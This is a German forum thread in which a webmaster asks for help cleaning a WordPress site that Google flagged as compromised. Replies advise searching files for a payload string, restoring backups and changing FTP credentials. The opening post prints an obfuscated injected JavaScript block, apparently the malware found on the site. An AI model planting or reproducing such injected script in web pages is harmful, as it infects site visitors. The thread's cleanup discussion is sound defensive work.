Infizierte Seite - Laut Googel attakiert gemeldet

  • Hallo!

    Ich habe ein Problem - einer meiner Seiten und zwar http://www.nicobartes.com
    ist infiziert und wurde vor einigen Stunden auch noch auf attakierte Webseite von Google umgestellt!!!!!

    Laut Webmaster Tools befindet sich dieser Code auf meiner Domain:

    Hi!

    I have the same Problem as jerome..

    My site http://www.nicobartes.com is infected and google has labeld my site as attacked!!!!!!!!

    I’ve been researching this issue for hours with no luck. I’ve opened every file and looked for a long string of random characters – with NO luck.

    Question:
    Is there a more efficient way to search all files in a directory?

    Any help is very much appreciated!!!


    my infected code description from Google Webmaster:

    <script type='text/javascript'>st="en0no3mno3nia-flien0htpno
    3rxrpno3rxen0d";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2",
    "%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&
    $?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!
    ^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^
    &*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+
    &*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~
    &@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:
    &_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:
    &_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+
    $_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~
    &_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$
    $:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!
    &<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:
    &_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^
    !+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:
    &~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&
    &<!$


    Ich habe stunden lang gesucht und finde nichts! Auch mein Betreiber vom Server findet nichts...

    Kann mir jemand helfen wie ich nach diesem Code suche und finde, damit ich ihn löschen kann?????


    Wäre sehr dankbar

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hi,

    mein ESET Nod32 schlägt auch Alarm. Da sollte also was dran sein und du solltest deine Seite so schnell wie möglich vom Netz nehmen, damit nicht noch andere Besucher ohne Virenscanner infiziert werden.

    Nimm die Seite vom Netz und lade sie erst mal komplett herunter. Dann würde ich z.B. mit "GrepWin" in dem Hauptordner nach "en0no3mno3nia-flien0htpno" suchen lassen. Welches FTP-Programm benutzt du?

    Schöne Grüße,
    Jan

  • Hallo

    Danke für die Antowrt...

    Ich werde mal versuchen die Dateien zu löschen und mit einem Backup
    von vor einem Monat zu ersetzten.

    Ich verwernde Flash FXP, die ich mir vor einigen Wochen gekauft habe

    Also ich weiß nicht mehr weiter... um jede Hilfe wäre ich sehr dankbar

  • Hallo

    Ich habe soeben den wp-admin und den wp-includes Ordner und die im Stammverzeichnis liegenden Dateien gelöscht und danach vom Backup wieder eingestellt.

    Zusätzlich habe ich alle NICHT benötigten Unterordner wo ich auch wordpress
    Installationen drauf hatte gelöscht.

    1.
    Kann mir jemand bitte sagen ob euer Antivirus noch eine Bedrohung anzeigt???

    2.
    Ich habe meinen pc mit Avg, Malwarebytes und Norman gescannt und nichts gefunden. Was sollte ich noch machen?

    3.
    Ich habe mein FTP Passwort geändert - Sollte ich noch was beachten???


    Recht herzlichen Dank

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!